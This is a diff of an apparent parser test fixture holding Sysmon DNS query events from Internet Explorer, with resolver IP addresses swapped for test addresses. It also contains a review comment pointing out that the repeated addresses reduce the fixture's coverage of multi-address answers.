ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -4892,7 +4892,7 @@
 "time_created": "2019-07-18T03:34:04.692Z",
 "level": "information",
 "event_data": {
- "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.184",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4915,7 +4915,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -4940,7 +4940,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.comodoca.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -4956,7 +4956,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4968,7 +4968,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4998,7 +4998,7 @@
 "ProcessId": "2736",
 "QueryName": "sync-tm.everesttech.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;",
+ "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "event_id": "22"
@@ -5029,7 +5029,7 @@
 "event_data": {
 "QueryName": "idsync.rlcdn.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;",
+ "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.237",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -5040,7 +5040,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5052,7 +5052,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
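Review bot: Every answer in the new QueryResults for cm.adform.net is the same value, `::ffff:89.160.20.156;` repeated six times, so this case no longer exercises a resolver response carrying several distinct IPv4 hosts; the same collapse happens in the hunks at 5074, 5178/5190, 5352, 5376 and 5388. If the pipeline splits QueryResults into a list or de-duplicates into related.ip, a regression that keeps only the first address would now pass against this fixture. Since this expected file presumably mirrors the sample log it is generated from, the fix belongs in the input sample: give each multi-answer record distinct addresses from the supported test subset and regenerate the expected output. The answers that mix 192.168.x.30 with IPv6 records (e.g. the hunk at 5040) keep their distinct-value coverage, so only the all-IPv4 answers need attention.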
@@ -5074,7 +5074,7 @@ "ProcessId": "2736", "QueryName": "cm.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;" + "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": "22", 
@@ -5091,7 +5091,7 @@ { "@timestamp": "2021-05-05T15:30:51.706Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
